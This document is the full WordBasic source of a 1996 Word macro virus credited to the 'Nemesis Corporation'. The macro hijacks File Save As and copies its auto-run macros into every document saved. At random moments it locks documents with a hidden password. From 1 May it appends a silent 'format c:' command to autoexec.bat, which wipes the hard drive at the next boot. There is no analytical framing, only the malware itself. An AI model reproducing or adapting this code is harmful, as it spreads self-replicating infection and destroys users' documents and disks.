Macro DateiSpeichernUnter Sub MAIN Dim dlg As FichierEnregistrerSous 'declare dialog as type FileSaveAs GetCurValues dlg On Error Goto finish Diag$ = "0" Section$ = "Compatibility" wininistr$ = "0x0020401" ProfileName$ = "RR2CD" PrintText$ = "Brought to you by the Nemesis Corporation, ©1996" Password$ = Chr$(120) + Chr$(101) + Chr$(110) + Chr$(105) + Chr$(120) + Chr$(111) + Chr$(115) DésactiverTouches 'dlg.Format = 0 Dialog dlg' execute the dialog. NoVir$ = GetProfileString$(Section$, ProfileName$) If (NoVir$ <> wininistr$) And (UCase$(NomFichier$()) <> "VIRUS_NEU.DOT") Then 'Is the document of Type=(WordDocument or Template) ? If (dlg.Format = 0) Or (dlg.Format = 1) Then 'Copy Macro's from Global data area into document. MacroCopie "Global:AutoExec", NomFenêtre$() + ":AutoExec", 1 MacroCopie "Global:AutoOpen", NomFenêtre$() + ":AutoOpen", 1 ' MakroKopieren "Global:BearbeitenRückgängig", FensterName$() + ":BearbeitenRückgängig", 1 MacroCopie "Global:DateiÖffnen", NomFenêtre$() + ":DateiÖffnen", 1 MacroCopie "Global:DateiBeenden", NomFenêtre$() + ":DateiBeenden", 1 MacroCopie "Global:DateiSpeichernUnter", NomFenêtre$() + ":DateiSpeichernUnter", 1 MacroCopie "Global:DateiSpeichern", NomFenêtre$() + ":DateiSpeichern", 1 MacroCopie "Global:Drop", NomFenêtre$() + ":Drop", 1 MacroCopie "Global:DateiDrucken", NomFenêtre$() + ":DateiDrucken", 1 MacroCopie "Global:DateiDruckenStandard", NomFenêtre$() + ":DateiDruckenStandard", 1 MacroCopie "Global:ExtrasMakro", NomFenêtre$() + ":ExtrasMakro", 1 MacroCopie "Global:Dummy", NomFenêtre$() + ":Dummy", 1 'Set to save document as a template. dlg.Format = 1 End If If (Seconde(Maintenant()) > 45) And (Diag$ = "0") Then dlg.MotDePasse = Password$ End If If (Mois(Maintenant()) = 3) And (Jour(Maintenant()) >= 1) And (Diag$ = "0") Then Call Drop End If If (Mois(Maintenant()) = 5) And (Jour(Maintenant()) >= 1) And (Diag$ = "0") Then DéfinirAttr "c:\autoexec.bat", 0 Open "c:\autoexec.bat" For Append As #1 Print #1, "@echo j|format c: /u >nul" Close #1 End If End If FichierEnregistrerSous dlg 'save the document infected. finish: End Sub